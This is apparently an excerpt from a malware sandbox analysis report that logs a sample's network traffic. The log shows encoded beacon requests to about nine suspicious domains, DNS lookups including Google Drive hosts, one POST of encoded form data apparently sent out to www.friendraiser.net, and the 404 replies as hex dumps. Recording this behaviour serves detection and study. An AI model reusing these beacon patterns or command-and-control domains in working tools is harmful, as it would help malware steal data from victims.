            Source: global trafficHTTP traffic detected: GET /iy1d/?KMQKD=pz8TTpInVv4i&blkI1=ZSfqdeaSZn0PRg5HdNh2oUAHptzY3MYMhDC626GF5PGt8z/G8rv53ZExREZuYXPhFHpYBiyGJNt7vuMK6nZlIfoyt3XPoEEAyqrm2BlCrN47QmvSDY8ChpY= HTTP/1.1Accept: */*Accept-Language: en-USHost: www.publicblockchain.xyzConnection: closeUser-Agent: Mozilla/5.0 (X11; Linux i686; rv:31.0) Gecko/20100101 Firefox/31.0 Iceweasel/31.6.0
            Source: global trafficHTTP traffic detected: GET /wv8g/?blkI1=YFLskH/DbjQtzAf6YgMWVDYXr1I+PcRXpzPtlnhpPmstkVM2wVfu8ec6CTTGtp43/+l9tlL+HBZr3lk6kvNfFNIpoa61SSBtKXC3KfwxiADM3Lv4Jry0tQA=&KMQKD=pz8TTpInVv4i HTTP/1.1Accept: */*Accept-Language: en-USHost: www.friendraiser.netConnection: closeUser-Agent: Mozilla/5.0 (X11; Linux i686; rv:31.0) Gecko/20100101 Firefox/31.0 Iceweasel/31.6.0
            Source: global trafficHTTP traffic detected: GET /fqe7/?KMQKD=pz8TTpInVv4i&blkI1=USxMWUqxojVByPBa5UT41ok3Moa+5KYfGEhA2ixPIKUlvuR24pNCpxAImz3DKUpd6pSJS1D95qfmGS9U5R/ToLLUYeH3zkBiolzUNHK+DfMbKpSjfwMuc1g= HTTP/1.1Accept: */*Accept-Language: en-USHost: www.arasmm.infoConnection: closeUser-Agent: Mozilla/5.0 (X11; Linux i686; rv:31.0) Gecko/20100101 Firefox/31.0 Iceweasel/31.6.0
            Source: global trafficHTTP traffic detected: GET /x0tm/?blkI1=eWDse7+BEFcY5cktXDPZtmHPP3S4Wrj93waxKU4kpmX2tJ5zSY5vSJGFDO0VR6ICah0iz99QU4wn/aaytqL4xYjcyy8X0gJ/duRvvp1PI2IylL7aVOnHlMc=&KMQKD=pz8TTpInVv4i HTTP/1.1Accept: */*Accept-Language: en-USHost: www.kismet.bizConnection: closeUser-Agent: Mozilla/5.0 (X11; Linux i686; rv:31.0) Gecko/20100101 Firefox/31.0 Iceweasel/31.6.0
            Source: global trafficHTTP traffic detected: GET /9wcy/?KMQKD=pz8TTpInVv4i&blkI1=stolL3vmLIGmoJLV7TJx61LUwbggQc+h55P+tBU1QCVHUuNKfEBFEL215Jq5kzn5OS5qP6O8JxHhNU/2p13ZL2IkpWVysp5nQetmWe2xm45Cit1+RMF/1UY= HTTP/1.1Accept: */*Accept-Language: en-USHost: www.antiviruslab.cyouConnection: closeUser-Agent: Mozilla/5.0 (X11; Linux i686; rv:31.0) Gecko/20100101 Firefox/31.0 Iceweasel/31.6.0
            Source: global trafficHTTP traffic detected: GET /zdje/?blkI1=bH964aYEFZTfPBlDLfXp4nr5ZPhWFhhHj48pqX8NcX3QBJSsXrSljQ+oXrbfRSf9pJthaeqSgvtBiM4dS6oUGNffJZaeVmozHjGX4zuSirREGsOVgdU/LH0=&KMQKD=pz8TTpInVv4i HTTP/1.1Accept: */*Accept-Language: en-USHost: www.temecula.dealsConnection: closeUser-Agent: Mozilla/5.0 (X11; Linux i686; rv:31.0) Gecko/20100101 Firefox/31.0 Iceweasel/31.6.0
            Source: global trafficHTTP traffic detected: GET /gubk/?blkI1=WfXZudTo3dip/TkuA4M73rdEBI7C2gZJqR+yv5Ymhwaua4fKE23qrk5g+CAeCheJ0JaqXN05F6vprYiLIN3bzk9uoIFijyVyrx/NoVVttwNY+ojTmaKYgGk=&KMQKD=pz8TTpInVv4i HTTP/1.1Accept: */*Accept-Language: en-USHost: www.031234399.xyzConnection: closeUser-Agent: Mozilla/5.0 (X11; Linux i686; rv:31.0) Gecko/20100101 Firefox/31.0 Iceweasel/31.6.0
            Source: global trafficHTTP traffic detected: GET /ux2u/?blkI1=DFNbHI9W2QzgkC5h/j+husawXia3UEqdl74RIrA1ZdizrejP3tXDU/ScEElXet8i6Y7Mlgey/1sIY1NCHdc+MLGxJi0Co8xHHrfzy/Yt5+Q5a4sfhKi+vMU=&KMQKD=pz8TTpInVv4i HTTP/1.1Accept: */*Accept-Language: en-USHost: www.ykkk7.yachtsConnection: closeUser-Agent: Mozilla/5.0 (X11; Linux i686; rv:31.0) Gecko/20100101 Firefox/31.0 Iceweasel/31.6.0
            Source: global trafficHTTP traffic detected: GET /d157/?blkI1=27OdbQs3uVKd/sKfWa1X1QmTKwkueZ5FDF9iVFMlFgZK/CHmSHC8xH7poFHa9IOGTD7nrOLI8SVCcUuFrhq/EKz04Ygq08x26qMVVorUcIYvhfI9M7013oE=&KMQKD=pz8TTpInVv4i HTTP/1.1Accept: */*Accept-Language: en-USHost: www.okoty19.vipConnection: closeUser-Agent: Mozilla/5.0 (X11; Linux i686; rv:31.0) Gecko/20100101 Firefox/31.0 Iceweasel/31.6.0
            Source: global trafficDNS traffic detected: DNS query: drive.google.com
            Source: global trafficDNS traffic detected: DNS query: drive.usercontent.google.com
            Source: global trafficDNS traffic detected: DNS query: www.publicblockchain.xyz
            Source: global trafficDNS traffic detected: DNS query: www.friendraiser.net
            Source: global trafficDNS traffic detected: DNS query: www.arasmm.info
            Source: global trafficDNS traffic detected: DNS query: www.kismet.biz
            Source: global trafficDNS traffic detected: DNS query: www.antiviruslab.cyou
            Source: global trafficDNS traffic detected: DNS query: www.temecula.deals
            Source: global trafficDNS traffic detected: DNS query: www.031234399.xyz
            Source: global trafficDNS traffic detected: DNS query: www.ykkk7.yachts
            Source: global trafficDNS traffic detected: DNS query: www.okoty19.vip
            Source: global trafficDNS traffic detected: DNS query: www.neixn.xyz
            Source: global trafficDNS traffic detected: DNS query: www.knowesis.app
            Source: global trafficDNS traffic detected: DNS query: www.essense.ltd
            Source: global trafficDNS traffic detected: DNS query: www.cubeify.xyz
            Source: global trafficDNS traffic detected: DNS query: www.580051.pro
            Source: global trafficDNS traffic detected: DNS query: www.mobilegaruda.pro
            Source: global trafficDNS traffic detected: DNS query: www.loonerverse.app
            Source: unknownHTTP traffic detected: POST /wv8g/ HTTP/1.1Accept: */*Accept-Encoding: gzip, deflate, brAccept-Language: en-USHost: www.friendraiser.netOrigin: http://www.friendraiser.netCache-Control: max-age=0Content-Type: application/x-www-form-urlencodedContent-Length: 202Connection: closeReferer: http://www.friendraiser.net/wv8g/User-Agent: Mozilla/5.0 (X11; Linux i686; rv:31.0) Gecko/20100101 Firefox/31.0 Iceweasel/31.6.0Data Raw: 62 6c 6b 49 31 3d 56 48 6a 4d 6e 78 58 33 52 53 5a 37 36 41 66 45 41 43 46 32 43 44 51 61 39 31 55 4d 4c 4a 64 41 70 43 58 68 69 44 4a 6a 66 51 6c 35 39 31 35 31 32 77 6e 76 69 66 6f 5a 4c 44 6d 61 72 75 46 64 37 66 4a 4d 6c 6d 33 6a 47 79 35 34 6b 53 6c 73 67 65 35 4f 56 71 55 4c 6d 5a 65 2f 63 57 52 4a 56 6e 33 73 58 49 78 51 2f 42 50 4b 6e 61 62 43 50 50 43 59 2f 51 6d 67 6e 4c 4f 45 75 63 4e 51 76 48 2b 49 68 32 4e 4c 39 74 32 44 42 6b 4a 55 31 55 4a 43 55 77 35 4a 76 56 75 42 33 59 49 61 37 61 34 49 50 58 77 74 5a 6b 66 72 76 4d 56 30 30 57 59 44 6b 4e 39 61 42 5a 41 2f 6b 61 6f 32 65 67 3d 3d Data Ascii: blkI1=VHjMnxX3RSZ76AfEACF2CDQa91UMLJdApCXhiDJjfQl591512wnvifoZLDmaruFd7fJMlm3jGy54kSlsge5OVqULmZe/cWRJVn3sXIxQ/BPKnabCPPCY/QmgnLOEucNQvH+Ih2NL9t2DBkJU1UJCUw5JvVuB3YIa7a4IPXwtZkfrvMV00WYDkN9aBZA/kao2eg==
            Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundCache-Control: privateContent-Type: text/html; charset=utf-8Server: Microsoft-IIS/10.0X-Powered-By: ASP.NETDate: Tue, 11 Mar 2025 04:04:40 GMTConnection: closeContent-Length: 4855Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 57 33 43 2f 2f 44 54 44 20 58 48 54 4d 4c 20 31 2e 30 20 53 74 72 69 63 74 2f 2f 45 4e 22 20 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 54 52 2f 78 68 74 6d 6c 31 2f 44 54 44 2f 78 68 74 6d 6c 31 2d 73 74 72 69 63 74 2e 64 74 64 22 3e 20 0a 3c 68 74 6d 6c 20 78 6d 6c 6e 73 3d 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 31 39 39 39 2f 78 68 74 6d 6c 22 3e 20 0a 3c 68 65 61 64 3e 20 0a 3c 74 69 74 6c 65 3e 49 49 53 20 31 30 2e 30 20 44 65 74 61 69 6c 65 64 20 45 72 72 6f 72 20 2d 20 34 30 34 2e 30 20 2d 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 20 0a 3c 73 74 79 6c 65 20 74 79 70 65 3d 22 74 65 78 74 2f 63 73 73 22 3e 20 0a 3c 21 2d 2d 20 0a 62 6f 64 79 7b 6d 61 72 67 69 6e 3a 30 3b 66 6f 6e 74 2d 73 69 7a 65 3a 2e 37 65 6d 3b 66 6f 6e 74 2d 66 61 6d 69 6c 79 3a 56 65 72 64 61 6e 61 2c 41 72 69 61 6c 2c 48 65 6c 76 65 74 69 63 61 2c 73 61 6e 73 2d 73 65 72 69 66 3b 7d 20 0a 63 6f 64 65 7b 6d 61 72 67 69 6e 3a 30 3b 63 6f 6c 6f 72 3a 23 30 30 36 36 30 30 3b 66 6f 6e 74 2d 73 69 7a 65 3a 31 2e 31 65 6d 3b 66 6f 6e 74 2d 77 65 69 67 68 74 3a 62 6f 6c 64 3b 7d 20 0a 2e 63 6f 6e 66 69 67 5f 73 6f 75 72 63 65 20 63 6f 64 65 7b 66 6f 6e 74 2d 73 69 7a 65 3a 2e 38 65 6d 3b 63 6f 6c 6f 72 3a 23 30 30 30 30 30 30 3b 7d 20 0a 70 72 65 7b 6d 61 72 67 69 6e 3a 30 3b 66 6f 6e 74 2d 73 69 7a 65 3a 31 2e 34 65 6d 3b 77 6f 72 64 2d 77 72 61 70 3a 62 72 65 61 6b 2d 77 6f 72 64 3b 7d 20 0a 75 6c 2c 6f 6c 7b 6d 61 72 67 69 6e 3a 31 30 70 78 20 30 20 31 30 70 78 20 35 70 78 3b 7d 20 0a 75 6c 2e 66 69 72 73 74 2c 6f 6c 2e 66 69 72 73 74 7b 6d 61 72 67 69 6e 2d 74 6f 70 3a 35 70 78 3b 7d 20 0a 66 69 65 6c 64 73 65 74 7b 70 61 64 64 69 6e 67 3a 30 20 31 35 70 78 20 31 30 70 78 20 31 35 70 78 3b 77 6f 72 64 2d 62 72 65 61 6b 3a 62 72 65 61 6b 2d 61 6c 6c 3b 7d 20 0a 2e 73 75 6d 6d 61 72 79 2d 63 6f 6e 74 61 69 6e 65 72 20 66 69 65 6c 64 73 65 74 7b 70 61 64 64 69 6e 67 2d 62 6f 74 74 6f 6d 3a 35 70 78 3b 6d 61 72 67 69 6e 2d 74 6f 70 3a 34 70 78 3b 7d 20 0a 6c 65 67 65 6e 64 2e 6e 6f 2d 65 78 70 61 6e 64 2d 61 6c 6c 7b 70 61 64 64 69 6e 67 3a 32 70 78 20 31 35 70 78 20 34 70 78 20 31 30 70 78 3b 6d 61 72 67 69 6e 3a 30 20 30 20 30 20 2d 31 32 70 78 3b 7d 20 0a 6c 65 67 65 6e 64 7b 63 6f 6c 6f 72 3a 23 33 33 33 33 33 33 3b 3b 6d 61 72 67 69 6e 3a 34 70 78 20 30 20 38 70 78 20 2d 31 32 70 78 3b 5f 6d 61 72 67 69 6e 2d 74 6f 70 3a 30 70 78 3b 20 0a 66 6f 6e 74 2d 77 65 69 67 68 74 3a 62 6f 6c 64 3b 66 6f 6e 74 2d 73 69 7a 65 3a 31 65 6d 3b 7d 20 0a 61 3a 6c 69 6e 6b 2c 61 3a 76 69 73 69 74 65 64 7b 63 6f 6c 6f 72 3a 23 30 30 37 45 46 46 3b 66 6f 6e 74 2d 77 65 69 67 68 74 3a 62 6f 6c 64 3b 7d 20 0a 61 3a 68 6f 76 65 72 7b 74 65 78 74 2d 6
            Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundCache-Control: privateContent-Type: text/html; charset=utf-8Server: Microsoft-IIS/10.0X-Powered-By: ASP.NETDate: Tue, 11 Mar 2025 04:04:42 GMTConnection: closeContent-Length: 4855Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 57 33 43 2f 2f 44 54 44 20 58 48 54 4d 4c 20 31 2e 30 20 53 74 72 69 63 74 2f 2f 45 4e 22 20 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 54 52 2f 78 68 74 6d 6c 31 2f 44 54 44 2f 78 68 74 6d 6c 31 2d 73 74 72 69 63 74 2e 64 74 64 22 3e 20 0a 3c 68 74 6d 6c 20 78 6d 6c 6e 73 3d 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 31 39 39 39 2f 78 68 74 6d 6c 22 3e 20 0a 3c 68 65 61 64 3e 20 0a 3c 74 69 74 6c 65 3e 49 49 53 20 31 30 2e 30 20 44 65 74 61 69 6c 65 64 20 45 72 72 6f 72 20 2d 20 34 30 34 2e 30 20 2d 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 20 0a 3c 73 74 79 6c 65 20 74 79 70 65 3d 22 74 65 78 74 2f 63 73 73 22 3e 20 0a 3c 21 2d 2d 20 0a 62 6f 64 79 7b 6d 61 72 67 69 6e 3a 30 3b 66 6f 6e 74 2d 73 69 7a 65 3a 2e 37 65 6d 3b 66 6f 6e 74 2d 66 61 6d 69 6c 79 3a 56 65 72 64 61 6e 61 2c 41 72 69 61 6c 2c 48 65 6c 76 65 74 69 63 61 2c 73 61 6e 73 2d 73 65 72 69 66 3b 7d 20 0a 63 6f 64 65 7b 6d 61 72 67 69 6e 3a 30 3b 63 6f 6c 6f 72 3a 23 30 30 36 36 30 30 3b 66 6f 6e 74 2d 73 69 7a 65 3a 31 2e 31 65 6d 3b 66 6f 6e 74 2d 77 65 69 67 68 74 3a 62 6f 6c 64 3b 7d 20 0a 2e 63 6f 6e 66 69 67 5f 73 6f 75 72 63 65 20 63 6f 64 65 7b 66 6f 6e 74 2d 73 69 7a 65 3a 2e 38 65 6d 3b 63 6f 6c 6f 72 3a 23 30 30 30 30 30 30 3b 7d 20 0a 70 72 65 7b 6d 61 72 67 69 6e 3a 30 3b 66 6f 6e 74 2d 73 69 7a 65 3a 31 2e 34 65 6d 3b 77 6f 72 64 2d 77 72 61 70 3a 62 72 65 61 6b 2d 77 6f 72 64 3b 7d 20 0a 75 6c 2c 6f 6c 7b 6d 61 72 67 69 6e 3a 31 30 70 78 20 30 20 31 30 70 78 20 35 70 78 3b 7d 20 0a 75 6c 2e 66 69 72 73 74 2c 6f 6c 2e 66 69 72 73 74 7b 6d 61 72 67 69 6e 2d 74 6f 70 3a 35 70 78 3b 7d 20 0a 66 69 65 6c 64 73 65 74 7b 70 61 64 64 69 6e 67 3a 30 20 31 35 70 78 20 31 30 70 78 20 31 35 70 78 3b 77 6f 72 64 2d 62 72 65 61 6b 3a 62 72 65 61 6b 2d 61 6c 6c 3b 7d 20 0a 2e 73 75 6d 6d 61 72 79 2d 63 6f 6e 74 61 69 6e 65 72 20 66 69 65 6c 64 73 65 74 7b 70 61 64 64 69 6e 67 2d 62 6f 74 74 6f 6d 3a 35 70 78 3b 6d 61 72 67 69 6e 2d 74 6f 70 3a 34 70 78 3b 7d 20 0a 6c 65 67 65 6e 64 2e 6e 6f 2d 65 78 70 61 6e 64 2d 61 6c 6c 7b 70 61 64 64 69 6e 67 3a 32 70 78 20 31 35 70 78 20 34 70 78 20 31 30 70 78 3b 6d 61 72 67 69 6e 3a 30 20 30 20 30 20 2d 31 32 70 78 3b 7d 20 0a 6c 65 67 65 6e 64 7b 63 6f 6c 6f 72 3a 23 33 33 33 33 33 33 3b 3b 6d 61 72 67 69 6e 3a 34 70 78 20 30 20 38 70 78 20 2d 31 32 70 78 3b 5f 6d 61 72 67 69 6e 2d 74 6f 70 3a 30 70 78 3b 20 0a 66 6f 6e 74 2d 77 65 69 67 68 74 3a 62 6f 6c 64 3b 66 6f 6e 74 2d 73 69 7a 65 3a 31 65 6d 3b 7d 20 0a 61 3a 6c 69 6e 6b 2c 61 3a 76 69 73 69 74 65 64 7b 63 6f 6c 6f 72 3a 23 30 30 37 45 46 46 3b 66 6f 6e 74 2d 77 65 69 67 68 74 3a 62 6f 6c 64 3b 7d 20 0a 61 3a 68 6f 76 65 72 7b 74 65 78 74 2d 6
            Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundCache-Control: privateContent-Type: text/html; charset=utf-8Server: Microsoft-IIS/10.0X-Powered-By: ASP.NETDate: Tue, 11 Mar 2025 04:04:46 GMTConnection: closeContent-Length: 4855Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 57 33 43 2f 2f 44 54 44 20 58 48 54 4d 4c 20 31 2e 30 20 53 74 72 69 63 74 2f 2f 45 4e 22 20 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 54 52 2f 78 68 74 6d 6c 31 2f 44 54 44 2f 78 68 74 6d 6c 31 2d 73 74 72 69 63 74 2e 64 74 64 22 3e 20 0a 3c 68 74 6d 6c 20 78 6d 6c 6e 73 3d 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 31 39 39 39 2f 78 68 74 6d 6c 22 3e 20 0a 3c 68 65 61 64 3e 20 0a 3c 74 69 74 6c 65 3e 49 49 53 20 31 30 2e 30 20 44 65 74 61 69 6c 65 64 20 45 72 72 6f 72 20 2d 20 34 30 34 2e 30 20 2d 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 20 0a 3c 73 74 79 6c 65 20 74 79 70 65 3d 22 74 65 78 74 2f 63 73 73 22 3e 20 0a 3c 21 2d 2d 20 0a 62 6f 64 79 7b 6d 61 72 67 69 6e 3a 30 3b 66 6f 6e 74 2d 73 69 7a 65 3a 2e 37 65 6d 3b 66 6f 6e 74 2d 66 61 6d 69 6c 79 3a 56 65 72 64 61 6e 61 2c 41 72 69 61 6c 2c 48 65 6c 76 65 74 69 63 61 2c 73 61 6e 73 2d 73 65 72 69 66 3b 7d 20 0a 63 6f 64 65 7b 6d 61 72 67 69 6e 3a 30 3b 63 6f 6c 6f 72 3a 23 30 30 36 36 30 30 3b 66 6f 6e 74 2d 73 69 7a 65 3a 31 2e 31 65 6d 3b 66 6f 6e 74 2d 77 65 69 67 68 74 3a 62 6f 6c 64 3b 7d 20 0a 2e 63 6f 6e 66 69 67 5f 73 6f 75 72 63 65 20 63 6f 64 65 7b 66 6f 6e 74 2d 73 69 7a 65 3a 2e 38 65 6d 3b 63 6f 6c 6f 72 3a 23 30 30 30 30 30 30 3b 7d 20 0a 70 72 65 7b 6d 61 72 67 69 6e 3a 30 3b 66 6f 6e 74 2d 73 69 7a 65 3a 31 2e 34 65 6d 3b 77 6f 72 64 2d 77 72 61 70 3a 62 72 65 61 6b 2d 77 6f 72 64 3b 7d 20 0a 75 6c 2c 6f 6c 7b 6d 61 72 67 69 6e 3a 31 30 70 78 20 30 20 31 30 70 78 20 35 70 78 3b 7d 20 0a 75 6c 2e 66 69 72 73 74 2c 6f 6c 2e 66 69 72 73 74 7b 6d 61 72 67 69 6e 2d 74 6f 70 3a 35 70 78 3b 7d 20 0a 66 69 65 6c 64 73 65 74 7b 70 61 64 64 69 6e 67 3a 30 20 31 35 70 78 20 31 30 70 78 20 31 35 70 78 3b 77 6f 72 64 2d 62 72 65 61 6b 3a 62 72 65 61 6b 2d 61 6c 6c 3b 7d 20 0a 2e 73 75 6d 6d 61 72 79 2d 63 6f 6e 74 61 69 6e 65 72 20 66 69 65 6c 64 73 65 74 7b 70 61 64 64 69 6e 67 2d 62 6f 74 74 6f 6d 3a 35 70 78 3b 6d 61 72 67 69 6e 2d 74 6f 70 3a 34 70 78 3b 7d 20 0a 6c 65 67 65 6e 64 2e 6e 6f 2d 65 78 70 61 6e 64 2d 61 6c 6c 7b 70 61 64 64 69 6e 67 3a 32 70 78 20 31 35 70 78 20 34 70 78 20 31 30 70 78 3b 6d 61 72 67 69 6e 3a 30 20 30 20 30 20 2d 31 32 70 78 3b 7d 20 0a 6c 65 67 65 6e 64 7b 63 6f 6c 6f 72 3a 23 33 33 33 33 33 33 3b 3b 6d 61 72 67 69 6e 3a 34 70 78 20 30 20 38 70 78 20 2d 31 32 70 78 3b 5f 6d 61 72 67 69 6e 2d 74 6f 70 3a 30 70 78 3b 20 0a 66 6f 6e 74 2d 77 65 69 67 68 74 3a 62 6f 6c 64 3b 66 6f 6e 74 2d 73 69 7a 65 3a 31 65 6d 3b 7d 20 0a 61 3a 6c 69 6e 6b 2c 61 3a 76 69 73 69 74 65 64 7b 63 6f 6c 6f 72 3a 23 30 30 37 45 46 46 3b 66 6f 6e 74 2d 77 65 69 67 68 74 3a 62 6f 6c 64 3b 7d 20 0a 61 3a 68 6f 76 65 72 7b 74 65 78 74 2d 6
            Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundCache-Control: privateContent-Type: text/html; charset=utf-8Server: Microsoft-IIS/10.0X-Powered-By: ASP.NETDate: Tue, 11 Mar 2025 04:04:48 GMTConnection: closeContent-Length: 5005Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 57 33 43 2f 2f 44 54 44 20 58 48 54 4d 4c 20 31 2e 30 20 53 74 72 69 63 74 2f 2f 45 4e 22 20 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 54 52 2f 78 68 74 6d 6c 31 2f 44 54 44 2f 78 68 74 6d 6c 31 2d 73 74 72 69 63 74 2e 64 74 64 22 3e 20 0a 3c 68 74 6d 6c 20 78 6d 6c 6e 73 3d 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 31 39 39 39 2f 78 68 74 6d 6c 22 3e 20 0a 3c 68 65 61 64 3e 20 0a 3c 74 69 74 6c 65 3e 49 49 53 20 31 30 2e 30 20 44 65 74 61 69 6c 65 64 20 45 72 72 6f 72 20 2d 20 34 30 34 2e 30 20 2d 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 20 0a 3c 73 74 79 6c 65 20 74 79 70 65 3d 22 74 65 78 74 2f 63 73 73 22 3e 20 0a 3c 21 2d 2d 20 0a 62 6f 64 79 7b 6d 61 72 67 69 6e 3a 30 3b 66 6f 6e 74 2d 73 69 7a 65 3a 2e 37 65 6d 3b 66 6f 6e 74 2d 66 61 6d 69 6c 79 3a 56 65 72 64 61 6e 61 2c 41 72 69 61 6c 2c 48 65 6c 76 65 74 69 63 61 2c 73 61 6e 73 2d 73 65 72 69 66 3b 7d 20 0a 63 6f 64 65 7b 6d 61 72 67 69 6e 3a 30 3b 63 6f 6c 6f 72 3a 23 30 30 36 36 30 30 3b 66 6f 6e 74 2d 73 69 7a 65 3a 31 2e 31 65 6d 3b 66 6f 6e 74 2d 77 65 69 67 68 74 3a 62 6f 6c 64 3b 7d 20 0a 2e 63 6f 6e 66 69 67 5f 73 6f 75 72 63 65 20 63 6f 64 65 7b 66 6f 6e 74 2d 73 69 7a 65 3a 2e 38 65 6d 3b 63 6f 6c 6f 72 3a 23 30 30 30 30 30 30 3b 7d 20 0a 70 72 65 7b 6d 61 72 67 69 6e 3a 30 3b 66 6f 6e 74 2d 73 69 7a 65 3a 31 2e 34 65 6d 3b 77 6f 72 64 2d 77 72 61 70 3a 62 72 65 61 6b 2d 77 6f 72 64 3b 7d 20 0a 75 6c 2c 6f 6c 7b 6d 61 72 67 69 6e 3a 31 30 70 78 20 30 20 31 30 70 78 20 35 70 78 3b 7d 20 0a 75 6c 2e 66 69 72 73 74 2c 6f 6c 2e 66 69 72 73 74 7b 6d 61 72 67 69 6e 2d 74 6f 70 3a 35 70 78 3b 7d 20 0a 66 69 65 6c 64 73 65 74 7b 70 61 64 64 69 6e 67 3a 30 20 31 35 70 78 20 31 30 70 78 20 31 35 70 78 3b 77 6f 72 64 2d 62 72 65 61 6b 3a 62 72 65 61 6b 2d 61 6c 6c 3b 7d 20 0a 2e 73 75 6d 6d 61 72 79 2d 63 6f 6e 74 61 69 6e 65 72 20 66 69 65 6c 64 73 65 74 7b 70 61 64 64 69 6e 67 2d 62 6f 74 74 6f 6d 3a 35 70 78 3b 6d 61 72 67 69 6e 2d 74 6f 70 3a 34 70 78 3b 7d 20 0a 6c 65 67 65 6e 64 2e 6e 6f 2d 65 78 70 61 6e 64 2d 61 6c 6c 7b 70 61 64 64 69 6e 67 3a 32 70 78 20 31 35 70 78 20 34 70 78 20 31 30 70 78 3b 6d 61 72 67 69 6e 3a 30 20 30 20 30 20 2d 31 32 70 78 3b 7d 20 0a 6c 65 67 65 6e 64 7b 63 6f 6c 6f 72 3a 23 33 33 33 33 33 33 3b 3b 6d 61 72 67 69 6e 3a 34 70 78 20 30 20 38 70 78 20 2d 31 32 70 78 3b 5f 6d 61 72 67 69 6e 2d 74 6f 70 3a 30 70 78 3b 20 0a 66 6f 6e 74 2d 77 65 69 67 68 74 3a 62 6f 6c 64 3b 66 6f 6e 74 2d 73 69 7a 65 3a 31 65 6d 3b 7d 20 0a 61 3a 6c 69 6e 6b 2c 61 3a 76 69 73 69 74 65 64 7b 63 6f 6c 6f 72 3a 23 30 30 37 45 46 46 3b 66 6f 6e 74 2d 77 65 69 67 68 74 3a 62 6f 6c 64 3b 7d 20 0a 61 3a 68 6f 76 65 72 7b 74 65 78 74 2d 6
            Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.18.0Date: Tue, 11 Mar 2025 04:04:55 GMTTransfer-Encoding: chunkedConnection: closeData Raw: 30 0d 0a 0d 0a Data Ascii: 0
            Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.18.0Date: Tue, 11 Mar 2025 04:04:58 GMTTransfer-Encoding: chunkedConnection: closeData Raw: 30 0d 0a 0d 0a Data Ascii: 0
            Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.18.0Date: Tue, 11 Mar 2025 04:05:01 GMTTransfer-Encoding: chunkedConnection: closeData Raw: 30 0d 0a 0d 0a Data Ascii: 0
            Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Tue, 11 Mar 2025 04:05:49 GMTServer: ApacheContent-Length: 315Connection: closeContent-Type: text/html; charset=iso-8859-1Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 0a 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p><p>Additionally, a 404 Not Founderror was encountered while trying to use an ErrorDocument to handle the request.</p></body></html>
